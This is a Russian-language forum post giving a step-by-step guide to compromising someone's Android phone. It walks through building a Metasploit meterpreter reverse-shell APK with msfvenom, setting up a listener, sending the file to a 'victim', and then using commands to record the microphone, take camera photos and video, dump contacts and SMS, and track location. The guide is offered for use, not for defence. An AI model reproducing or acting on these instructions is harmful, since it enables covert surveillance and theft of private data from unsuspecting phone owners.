Взлом android на разные плюшки

Morty

VIP
26 Окт 2017
537
110
0
46
1. Для начала нужно скачать и установить Termux (не реклама
Please, Вход or Регистрация для просмотра содержимого URL-адресов!
)
2. Установить metasploit (
Please, Вход or Регистрация для просмотра содержимого URL-адресов!
)
3. Дать разрешение на сохранение файлов в корневой папки телефона.


1.Заходим в Разрешения приложений>Память
cc1943c2b902041917075ce081d8ef52.png
2.Ставим галочку напротив Termux
d425b74f14c6644d05cce9fac8e51976.png
Показываю только эти скрины,ибо в каждом телефона по-разному
4. Далее открываем metasploit командой "msfconsole"
5. Узнаём свой IP командой "ifconfig"
6. Пишем "msfvenom -p android/meterpreter/reverse_tcp LHOST=СВОЙ ИП LPORT=4444 R > bhf.apk"


Файл сохраняется в /data/data/com.termux/files/home ,также можно изменить место сохранения файла.Если кому нужно объяснить,то пишите в комментарии.
7. Пишем "use multi/handler"
8. Пишем "set payload android/meterpreter/reverse_tcp"
9. Пишем "set LHOST СВОЙ ИП"
10. Пишем "set LPORT 4444"
11. Запускаем "exploit"

Теперь кидаем файл жертве.Жертва открывает файл и устанавливает приложение.Когда жертва его установит,то у нас в консоли высветятся данные о жертве ,его ИП ,юсер-агент,время запуска и т.п
После того ,как у нас появилось ,это сообщение то и появится доступ к вводу в консоль.

Хи-хи-хи,разберемся , что же может данный exploit
Данные команды нужно вводить в консоль после того,как жертва запустит и установит файл

record_mic - Запись с микрофона
webcam_snap - Делает онли фото с основной камеры (качество не самое лучшее)
webcam_stream - Записывает видео (Качество тоже не самое лучшее)
dump_contacts - Сохраняет контакты с sim-карты
dump_sms - Сохраняет смс с sim-карты
geolocate - Показывает местоположение телефона ,координатами

КОПИРОВАТЬ И ВСТАВЛЯТЬ КОМАНДЫ НУЖНО БЕЗ КАВЫЧЕК ,ЭТО ОБЯЗАТЕЛЬНО!!!